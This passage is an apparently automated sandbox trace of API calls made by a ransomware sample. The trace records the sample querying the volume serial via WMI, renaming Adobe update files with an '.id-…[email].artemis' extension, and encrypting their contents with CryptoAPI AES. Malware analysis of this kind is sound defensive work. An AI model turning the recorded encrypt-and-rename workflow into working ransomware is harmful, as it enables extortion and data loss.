[7]=0x46))) returned 0x0 [0152.941] WbemLocator:IUnknown:Release (This=0x7813d4) returned 0x3 [0152.941] CoGetContextToken (in: pToken=0x6e4e0c8 | out: pToken=0x6e4e0c8) returned 0x0 [0152.941] CoGetContextToken (in: pToken=0x6e4e4d0 | out: pToken=0x6e4e4d0) returned 0x0 [0152.941] WbemLocator:IUnknown:QueryInterface (in: This=0x781474, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e560 | out: ppvObject=0x6e4e560*=0x78145c) returned 0x0 [0152.941] WbemLocator:IRpcOptions:Query (in: This=0x78145c, pPrx=0x781474, dwProperty=2, pdwValue=0x6e4e588 | out: pdwValue=0x6e4e588) returned 0x80004002 [0152.941] WbemLocator:IUnknown:Release (This=0x78145c) returned 0x3 [0152.941] WbemLocator:IUnknown:Release (This=0x781474) returned 0x2 [0152.941] CoGetContextToken (in: pToken=0x6e4eaa8 | out: pToken=0x6e4eaa8) returned 0x0 [0152.941] CoGetContextToken (in: pToken=0x6e4ea08 | out: pToken=0x6e4ea08) returned 0x0 [0152.941] WbemLocator:IUnknown:QueryInterface (in: This=0x781474, riid=0x6e4ead8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6e4ead4 | out: ppvObject=0x6e4ead4*=0x6742f1c) returned 0x0 [0152.941] WbemLocator:IUnknown:AddRef (This=0x6742f1c) returned 0x4 [0152.941] WbemLocator:IUnknown:Release (This=0x6742f1c) returned 0x3 [0152.941] WbemLocator:IUnknown:Release (This=0x6742f1c) returned 0x2 [0152.941] SysStringLen (param_1=0x0) returned 0x0 [0152.941] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6737f20, puCount=0x6e4ee6c | out: puCount=0x6e4ee6c*=0x0) returned 0x0 [0152.942] WbemDefPath:IWbemPath:GetText (in: This=0x6737f20, lFlags=2, puBuffLength=0x6e4ee68*=0x0, pszText=0x0 | out: puBuffLength=0x6e4ee68*=0x20, pszText=0x0) returned 0x0 [0152.942] WbemDefPath:IWbemPath:GetText (in: This=0x6737f20, lFlags=2, puBuffLength=0x6e4ee68*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6e4ee68*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0152.942] CoGetContextToken (in: pToken=0x6e4ead8 | out: pToken=0x6e4ead8) returned 0x0 [0152.942] WbemLocator:IUnknown:AddRef (This=0x781474) returned 0x3 [0152.942] WbemLocator:IUnknown:QueryInterface (in: This=0x781474, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e96c | out: ppvObject=0x6e4e96c*=0x781474) returned 0x0 [0152.942] WbemLocator:IUnknown:Release (This=0x781474) returned 0x3 [0152.942] WbemLocator:IUnknown:Release (This=0x781474) returned 0x2 [0152.942] WbemDefPath:IWbemPath:GetText (in: This=0x6737f20, lFlags=2, puBuffLength=0x6e4ee70*=0x0, pszText=0x0 | out: puBuffLength=0x6e4ee70*=0x20, pszText=0x0) returned 0x0 [0152.942] WbemDefPath:IWbemPath:GetText (in: This=0x6737f20, lFlags=2, puBuffLength=0x6e4ee70*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6e4ee70*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0152.942] IWbemServices:GetObject (in: This=0x6742f1c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6e4ee24*=0x0, ppCallResult=0x0 | out: ppObject=0x6e4ee24*=0x673b930, ppCallResult=0x0) returned 0x0 [0154.658] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6737eb0, puCount=0x6e4ee24 | out: puCount=0x6e4ee24*=0x2) returned 0x0 [0154.658] WbemDefPath:IWbemPath:GetText (in: This=0x6737eb0, lFlags=4, puBuffLength=0x6e4ee20*=0x0, pszText=0x0 | out: puBuffLength=0x6e4ee20*=0xf, pszText=0x0) returned 0x0 [0154.658] WbemDefPath:IWbemPath:GetText (in: This=0x6737eb0, lFlags=4, puBuffLength=0x6e4ee20*=0xf, pszText="00000000000000" | out: puBuffLength=0x6e4ee20*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0154.658] IWbemClassObject:Get (in: This=0x673b930, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6e4ee20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x344a55c*=0, plFlavor=0x344a560*=0 | out: pVal=0x6e4ee20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x344a55c*=8, plFlavor=0x344a560*=0) returned 0x0 [0154.659] SysStringByteLen (bstr="9C354B42") returned 0x10 [0154.659] SysStringByteLen (bstr="9C354B42") returned 0x10 [0154.659] IWbemClassObject:Get (in: This=0x673b930, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6e4ee28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x344a55c*=8, plFlavor=0x344a560*=0 | out: pVal=0x6e4ee28*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x344a55c*=8, plFlavor=0x344a560*=0) returned 0x0 [0154.659] SysStringByteLen (bstr="9C354B42") returned 0x10 [0154.659] SysStringByteLen (bstr="9C354B42") returned 0x10 [0154.659] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp", nBufferLength=0x105, lpBuffer=0x6e4ea28, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp", lpFilePart=0x0) returned 0x3d [0154.659] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x6e4ea28, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x68 [0154.659] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4ee88) returned 1 [0154.659] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp"), fInfoLevelId=0x0, lpFileInformation=0x6e4ef04 | out: lpFileInformation=0x6e4ef04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e186d00, ftCreationTime.dwHighDateTime=0x1cfb543, ftLastAccessTime.dwLowDateTime=0x7e186d00, ftLastAccessTime.dwHighDateTime=0x1cfb543, ftLastWriteTime.dwLowDateTime=0x5bef160, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x3da20)) returned 1 [0154.659] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4ee84) returned 1 [0154.659] MoveFileW (lpExistingFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp"), lpNewFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0154.660] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp", nBufferLength=0x105, lpBuffer=0x6e4eacc, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp", lpFilePart=0x0) returned 0x3e [0154.660] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp", nBufferLength=0x105, lpBuffer=0x6e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp", lpFilePart=0x0) returned 0x3e [0154.660] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6e4eacc, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x37 [0154.660] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4ef2c) returned 1 [0154.660] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\info-decrypt.hta" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6e4efa8 | out: lpFileInformation=0x6e4efa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4af94a0, ftCreationTime.dwHighDateTime=0x1d6a20b, ftLastAccessTime.dwLowDateTime=0x4af94a0, ftLastAccessTime.dwHighDateTime=0x1d6a20b, ftLastWriteTime.dwLowDateTime=0x4af94a0, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x1557)) returned 1 [0154.660] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4ef28) returned 1 [0154.660] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp", nBufferLength=0x105, lpBuffer=0x6e4ea48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp", lpFilePart=0x0) returned 0x3e [0154.660] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4eef4) returned 1 [0154.660] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp"), fInfoLevelId=0x0, lpFileInformation=0x344accc | out: lpFileInformation=0x344accc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4450880, ftCreationTime.dwHighDateTime=0x1cf6c45, ftLastAccessTime.dwLowDateTime=0xb4450880, ftLastAccessTime.dwHighDateTime=0x1cf6c45, ftLastWriteTime.dwLowDateTime=0xb4450880, ftLastWriteTime.dwHighDateTime=0x1cf6c45, nFileSizeHigh=0x0, nFileSizeLow=0x10e3000)) returned 1 [0154.661] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4eef0) returned 1 [0154.661] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp", nBufferLength=0x105, lpBuffer=0x6e4e934, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp", lpFilePart=0x0) returned 0x3e [0154.661] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4ee28) returned 1 [0154.661] CreateFileW (lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x460 [0154.661] GetFileType (hFile=0x460) returned 0x1 [0154.661] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4ee24) returned 1 [0154.661] GetFileType (hFile=0x460) returned 0x1 [0154.661] GetFileSize (in: hFile=0x460, lpFileSizeHigh=0x6e4ef30 | out: lpFileSizeHigh=0x6e4ef30*=0x0) returned 0x10e3000 [0165.765] ReadFile (in: hFile=0x460, lpBuffer=0x2f581018, nNumberOfBytesToRead=0x10e3000, lpNumberOfBytesRead=0x6e4eedc, lpOverlapped=0x0 | out: lpBuffer=0x2f581018*, lpNumberOfBytesRead=0x6e4eedc*=0x10e3000, lpOverlapped=0x0) returned 1 [0169.605] CloseHandle (hObject=0x460) returned 1 [0173.628] CryptAcquireContextW (in: phProv=0x6e4ee7c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6e4ee7c*=0x7a9ec0) returned 1 [0173.629] CryptGenRandom (in: hProv=0x7a9ec0, dwLen=0x10, pbBuffer=0x37ffd80 | out: pbBuffer=0x37ffd80) returned 1 [0175.188] CryptImportKey (in: hProv=0x7a9ec0, pbData=0x391b108, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6e4ee4c | out: phKey=0x6e4ee4c*=0x77b3f0) returned 1 [0175.188] CryptContextAddRef (hProv=0x7a9ec0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0175.188] CryptContextAddRef (hProv=0x7a9ec0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0175.188] CryptDuplicateKey (in: hKey=0x77b3f0, pdwReserved=0x0, dwFlags=0x0, phKey=0x6e4ee3c | out: phKey=0x6e4ee3c*=0x77b470) returned 1 [0175.188] CryptContextAddRef (hProv=0x7a9ec0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0175.188] CryptSetKeyParam (hKey=0x77b470, dwParam=0x4, pbData=0x391b1e8*=0x1, dwFlags=0x0) returned 1 [0175.188] CryptSetKeyParam (hKey=0x77b470, dwParam=0x1, pbData=0x391b1b4, dwFlags=0x0) returned 1 [0190.332] CryptEncrypt (in: hKey=0x77b470, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x430c1018*, pdwDataLen=0x6e4eea8*=0x10e3010, dwBufLen=0x10e3010 | out: pbData=0x430c1018*, pdwDataLen=0x6e4eea8*=0x10e3010) returned 1 [0190.975] CryptEncrypt (in: hKey=0x77b470, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3433f84*, pdwDataLen=0x6e4eeb0*=0x0, dwBufLen=0x10 | out: pbData=0x3433f84*, pdwDataLen=0x6e4eeb0*=0x10) returned 1 [0197.443] CryptDestroyKey (hKey=0x77b3f0) returned 1 [0197.443] CryptReleaseContext (hProv=0x7a9ec0, dwFlags=0x0) returned 1 [0197.443] CryptReleaseContext (hProv=0x7a9ec0, dwFlags=0x0) returned 1 [0197.443] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp", nBufferLength=0x105, lpBuffer=0x6e4e920, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp", lpFilePart=0x0) returned 0x3e [0197.443] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4ee14) returned 1 [0197.443] CreateFileW (lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x348 [0197.448] GetFileType (hFile=0x348) returned 0x1 [0197.448] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4ee10) returned 1 [0197.448] GetFileType (hFile=0x348) returned 0x1 [0197.448] WriteFile (in: hFile=0x348, lpBuffer=0xea21018*, nNumberOfBytesToWrite=0x10e3220, lpNumberOfBytesWritten=0x6e4eed0, lpOverlapped=0x0 | out: lpBuffer=0xea21018*, lpNumberOfBytesWritten=0x6e4eed0*=0x10e3220, lpOverlapped=0x0) returned 1 [0200.686] CloseHandle (hObject=0x348) returned 1 [0202.658] CoTaskMemAlloc (cb=0x20c) returned 0x9831858 [0202.659] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x9831858 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0202.659] CoTaskMemFree (pv=0x9831858) [0202.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6e4e908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0202.659] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6e4ee50 | out: ppv=0x6e4ee50*=0x72015c) returned 0x0 [0202.659] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6e4ee48 | out: pAptType=0x6e4ee48*=1) returned 0x0 [0202.659] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6e4ee4c | out: ppvObject=0x6e4ee4c*=0x0) returned 0x80004002 [0202.659] IUnknown:Release (This=0x72015c) returned 0x1 [0202.660] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6e4e7b8 | out: ppv=0x6e4e7b8*=0x6737068) returned 0x0 [0202.660] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737068, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6e4e9d0 | out: ppvObject=0x6e4e9d0*=0x0) returned 0x80004002 [0202.660] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6737068, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e9e4 | out: ppvObject=0x6e4e9e4*=0x6738c40) returned 0x0 [0202.660] WbemDefPath:IUnknown:Release (This=0x6737068) returned 0x0 [0202.660] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738c40, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e604 | out: ppvObject=0x6e4e604*=0x6738c40) returned 0x0 [0202.661] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738c40, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6e4e5c0 | out: ppvObject=0x6e4e5c0*=0x0) returned 0x80004002 [0202.661] WbemDefPath:IUnknown:AddRef (This=0x6738c40) returned 0x3 [0202.661] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738c40, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6e4df1c | out: ppvObject=0x6e4df1c*=0x0) returned 0x80004002 [0202.661] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738c40, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6e4decc | out: ppvObject=0x6e4decc*=0x0) returned 0x80004002 [0202.661] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738c40, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4ded8 | out: ppvObject=0x6e4ded8*=0x77bf18) returned 0x0 [0202.661] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77bf18, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6e4dee0 | out: pCid=0x6e4dee0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0202.661] WbemDefPath:IUnknown:Release (This=0x77bf18) returned 0x3 [0202.661] CoGetContextToken (in: pToken=0x6e4df38 | out: pToken=0x6e4df38) returned 0x0 [0202.661] CoGetContextToken (in: pToken=0x6e4dee8 | out: pToken=0x6e4dee8) returned 0x0 [0202.661] CoGetContextToken (in: pToken=0x6e4e340 | out: pToken=0x6e4e340) returned 0x0 [0202.661] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738c40, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e3d0 | out: ppvObject=0x6e4e3d0*=0x0) returned 0x80004002 [0202.661] WbemDefPath:IUnknown:Release (This=0x6738c40) returned 0x2 [0202.661] WbemDefPath:IUnknown:Release (This=0x6738c40) returned 0x1 [0202.661] CoGetContextToken (in: pToken=0x6e4ecc8 | out: pToken=0x6e4ecc8) returned 0x0 [0202.661] CoGetContextToken (in: pToken=0x6e4ec28 | out: pToken=0x6e4ec28) returned 0x0 [0202.661] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738c40, riid=0x6e4ecf8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6e4ecf4 | out: ppvObject=0x6e4ecf4*=0x6738c40) returned 0x0 [0202.661] WbemDefPath:IUnknown:AddRef (This=0x6738c40) returned 0x3 [0202.661] WbemDefPath:IUnknown:Release (This=0x6738c40) returned 0x2 [0202.661] WbemDefPath:IWbemPath:SetText (This=0x6738c40, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0202.661] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738c40, puCount=0x6e4ee7c | out: puCount=0x6e4ee7c*=0x0) returned 0x0 [0202.661] WbemDefPath:IWbemPath:GetText (in: This=0x6738c40, lFlags=2, puBuffLength=0x6e4ee78*=0x0, pszText=0x0 | out: puBuffLength=0x6e4ee78*=0x20, pszText=0x0) returned 0x0 [0202.662] WbemDefPath:IWbemPath:GetText (in: This=0x6738c40, lFlags=2, puBuffLength=0x6e4ee78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6e4ee78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0202.662] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738c40, uRequestedInfo=0x0, puResponse=0x6e4ee84 | out: puResponse=0x6e4ee84*=0xc19) returned 0x0 [0202.662] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738c40, puCount=0x6e4ee7c | out: puCount=0x6e4ee7c*=0x0) returned 0x0 [0202.662] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738c40, uRequestedInfo=0x0, puResponse=0x6e4ee84 | out: puResponse=0x6e4ee84*=0xc19) returned 0x0 [0202.662] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738c40, uRequestedInfo=0x0, puResponse=0x6e4ee84 | out: puResponse=0x6e4ee84*=0xc19) returned 0x0 [0202.662] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738c40, puCount=0x6e4edfc | out: puCount=0x6e4edfc*=0x0) returned 0x0 [0202.662] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x6e4ede8 | out: puCount=0x6e4ede8*=0x2) returned 0x0 [0202.662] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6e4ede4*=0x0, pszText=0x0 | out: puBuffLength=0x6e4ede4*=0xf, pszText=0x0) returned 0x0 [0202.662] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6e4ede4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6e4ede4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0202.662] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6e4ed98 | out: ppv=0x6e4ed98*=0x72015c) returned 0x0 [0202.662] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6e4ed90 | out: pAptType=0x6e4ed90*=1) returned 0x0 [0202.662] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6e4ed94 | out: ppvObject=0x6e4ed94*=0x0) returned 0x80004002 [0202.662] IUnknown:Release (This=0x72015c) returned 0x1 [0202.663] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6e4e700 | out: ppv=0x6e4e700*=0x6737088) returned 0x0 [0202.663] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737088, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6e4e918 | out: ppvObject=0x6e4e918*=0x0) returned 0x80004002 [0202.663] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6737088, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e92c | out: ppvObject=0x6e4e92c*=0x6738770) returned 0x0 [0202.663] WbemDefPath:IUnknown:Release (This=0x6737088) returned 0x0 [0202.663] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738770, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6e4e54c | out: ppvObject=0x6e4e54c*=0x6738770) returned 0x0 [0202.663] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738770, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, 